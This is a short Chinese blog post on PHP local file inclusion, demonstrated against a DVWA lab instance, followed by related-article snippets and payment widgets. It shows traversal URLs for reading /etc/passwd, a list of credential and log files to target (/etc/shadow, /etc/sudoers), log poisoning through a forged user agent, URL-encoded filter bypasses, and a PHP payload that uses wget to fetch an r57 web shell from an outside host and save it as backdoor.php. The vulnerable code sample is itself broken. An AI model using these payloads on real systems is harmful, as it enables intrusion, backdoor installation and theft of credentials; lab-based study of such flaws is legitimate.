远程包含

最新推荐文章于 2023-01-27 19:37:14 发布
最新推荐文章于 2023-01-27 19:37:14 发布
阅读量552 收藏
点赞数
分类专栏: Hacking 文章标签: firefox插件 web服务 php 浏览器 file 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/7347263
版权
 本地文件包含或LFI是一个漏洞或弱点,允许攻击者注入某网站上的目录遍历字符。发生这种情况时不消毒,这里是一个该死的网络易受攻击的应用程序的示例代码页: 

<?php

     $file $_GET['page']; //The page we wish to display 

?>

这里是脆弱示例链接:http://127.0.0.1/vulnerabilities/fi/?page=include.php

现在,让我们尝试做一个目录遍历Web服务器的passwd文件: http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd

可用于信息收集

/etc/environment
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log

有许多方法来利用一个Web服务器,攻击者可以注入的httpd日志,一个PHP代码或一个后门,并通过LFI再次访问:

/var/log/apache/error_log
/apache/logs/access.log
var/log/error.log

/ *and many more* / 
他人也可以使用一个Firefox插件用户代理切换,并产生一个壳:        
<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>

有些管理员可能会做一些过滤,以防止普通LFI攻击的,所以我们要做的是一个或多个字符在浏览器输入进行解码,但PHP不为十六进制编码。例如输入:

http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd 

7禧
关注
专栏目录
本地包含远程包含
zwj2691591102的博客
11-19 598
etc/httpd/conf/httpd.conf /etc/rc.local 有时可以读出来apache的路径 /usr/local/apache/conf/httpd.conf /var/www/html/apache/conf/httpd.conf /home/httpd/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/httpd/conf/httpd.conf /etc/apache/httpd.conf /usr/loca
远程文件包含漏洞
0xcc'Blog
05-12 2713
远程文件包含漏洞中时,攻击者可以通过访问外部地址来加载远程代码 在PHP的配置文件php.ini里将allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。 ...
本地包含远程包含
qq_68233961的博客
10-14 594
本地包含远程包含漏洞
包含文件漏洞详解
xlh日记本
04-02 1308
作者:IceskYsl@1st来源:天马行空{1.S.T}(http://www.1steam.cn)/申明:本站原创,欢迎转载,请注明来源天马行空{1.S.T}(http://www.1steam.cn)/=============首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从
php 远程包含文件漏洞分析第1/6页
10-29
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这...
远程包含漏洞获取webshell小实验
BrosyveryOK的博客
10-25 1387
​ 最近刚刚买了个小小的云服务器(哥们也是有服务器的人啦),可以更舒服的进行测试了,测试场景也更加真实,过段时间搭建一个博客,到时候就两边都发文章了。​ ok,直接开始今天的远程包含漏洞(RFI)小实验。
本第包含远程包含--学习篇
weixin_46865273的博客
05-19 715
1、什么是文件包含 用一句话来说就是,文件包含不下雨漏洞,当时由于对包含进行的文件不可控,导致了文件包含漏洞的产生 文件包含分为两种 1、本地文件包含LFI (包含本地文件操控LFI) 2、远程文件包含RFI (需要添加默认php是不开启远程文件包含 开启需要配置allow_url_include = On 通过SMB也可以绕过 文件包含的函数 include(‘1.txt’) 加载某个文件内容当作php代码进行执行,它不在意后缀任何文件都可以包含,包括图片码 php运行到inclu
PHP 网络开发详解之远程文件包含漏洞
10-29
远程文件包含漏洞是指在PHP编程中,攻击者利用PHP的include或require函数的特性来包含并执行远程服务器上的恶意脚本文件。因为PHP的include/require函数既可以包含本地文件也可以包含远程文件,这就为攻击者提供了一...
win11远程连接mstsc,提取完整文件包(10.0.22621)
01-09
在Windows 11操作系统中,Microsoft Terminal Services Client (MSTSC) 是用于远程桌面连接的主要工具,它允许用户访问和控制远程计算机。标题提到的是针对Win11的MSTSC的更新,具体版本号为10.0.22621,这意味着这...
zxshell_src_shelter7s2_zxshell_源码
10-02
zxshell后门源代码——一个功能强大的后门软件
remote desktop org源代码
03-14
remote desktop org源代码,完整打包,18年2月6日下载
zxshell_remotedesktop_src
12-09
zxshell 远程控制模块代码,包含Controller,Shell,zxsCommon三个压缩包
web安全--文件包含(本地包含远程包含
nareku的博客
04-05 4500
前言 文件包含漏洞简介: 文件包含的函数的参数没有经过过滤或者是严格的定义,并且参数可以被用户所控制,这样就可能包含非预期的文件。 一.文件包含漏洞常见的函数(默认都以php脚本为准啊) ①include: 包含并运行指定的文件,Include在出错的时候产生警告,脚本会继续运行 ②include_once:在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。 ③require :
本地文件包含远程文件包含(超详细,小白也彳亍!)
热门推荐
qq_45300786的博客
09-22 1万+
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不..
npm 安装远程包(github的)
weixin_30636089的博客
09-02 435
npm install git+ssh://git@github.com:xxx/xxx.git#master --save-dev npm install git+ssh://git@github.com:npm/npm.git#v1.0.27 npm install git+https://isaacs@github.com/npm/npm.git npm install git:...
远程包含和本地包含漏洞的原理
u010412301的博客
06-15 1196
远程包含和本地包含漏洞的原理  首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这样的 bug,只是具体的表现方式不一样罢了。 一、涉及到的危险函数〔include()
MultipartFile类初接触
Mr.Spade的博客
09-09 703
实现文件的上传时,文件类应该用 MultipartFile 类型。 MultipartFile 是 Spring 类型,代表 html 中 form data 方式上传的文件,包含二进制数据+文件名称。 注意:getName() 是获取表单中文件组件的名字,不是获取上传的文件的名称。应该用 getOriginalFilename()。 ...
远程文件包含原理及利用
G3et的博客
01-27 745
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
dvwa远程文件包含
最新发布
09-26
DVWA(Damn Vulnerable Web Application)是一个用于训练和测试Web应用程序漏洞的平台。远程文件包含是DVWA中的一个漏洞。远程文件包含漏洞允许攻击者通过传递恶意URL参数来包含远程文件,从而执行任意代码或获取敏感信息。 在DVWA中,远程文件包含漏洞可以通过修改URL参数来利用。攻击者可以通过传递恶意的URL参数从远程服务器上包含恶意代码文件,然后执行该代码。这可能导致许多安全问题,如远程命令执行、敏感信息泄露等。 为了防止远程文件包含漏洞,应该对输入进行充分的验证和过滤,确保只允许包含受信任的文件,并限制文件的访问权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值